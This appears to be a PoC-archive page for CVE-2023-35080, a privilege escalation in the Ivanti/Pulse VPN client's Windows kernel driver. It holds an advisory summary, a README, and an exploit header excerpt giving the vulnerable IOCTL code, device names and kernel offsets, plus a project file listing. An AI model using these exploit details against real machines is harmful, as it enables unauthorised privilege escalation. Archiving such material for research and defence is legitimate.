Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-35080 PoC — Ivanti Secure Access Client 安全漏洞

Source
Associated Vulnerability
Title:Ivanti Secure Access Client 安全漏洞 (CVE-2023-35080)
Description:Ivanti Secure Access Client是Ivanti公司的一个安全软件客户端。 Ivanti Secure Access Client 22.6R1.1之前版本存在安全漏洞,该漏洞源于允许经过本地身份验证的攻击者利用易受攻击的配置,从而导致权限升级、拒绝服务或信息泄露等。
Readme
# Ivanti/Pulse VPN Client Exploit of `CVE-2023-35080` leading to a privilege escalation

Code related to the exploitation of the `CVE-2023-35080` which leverages a write primitive in the Ivanti/Pulse VPN client kernel driver in Windows.
The write primitive conducts to a privilege escalation. 

The exploit was built with the help of the technical details shared in the following article : <https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation>.

Some details are hardcoded under the `main.h` file :

```C
#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]
```
File Snapshot

[4.0K] /data/pocs/8af7bc717c910d44810a37972bc4d8a1ba3ebd9f ├── [4.0K] Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation │   ├── [1015] error.c │   ├── [ 86] error.h │   ├── [6.7K] Ivanti-Pulse_Client_Exploit_Privilege-escalation.vcxproj │   ├── [1.4K] Ivanti-Pulse_Client_Exploit_Privilege-escalation.vcxproj.filters │   ├── [ 168] Ivanti-Pulse_Client_Exploit_Privilege-escalation.vcxproj.user │   ├── [6.6K] kernel.c │   ├── [1.6K] kernel.h │   ├── [9.4K] main.c │   └── [1.4K] main.h ├── [1.6K] Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation.sln └── [1.3K] README.md 1 directory, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.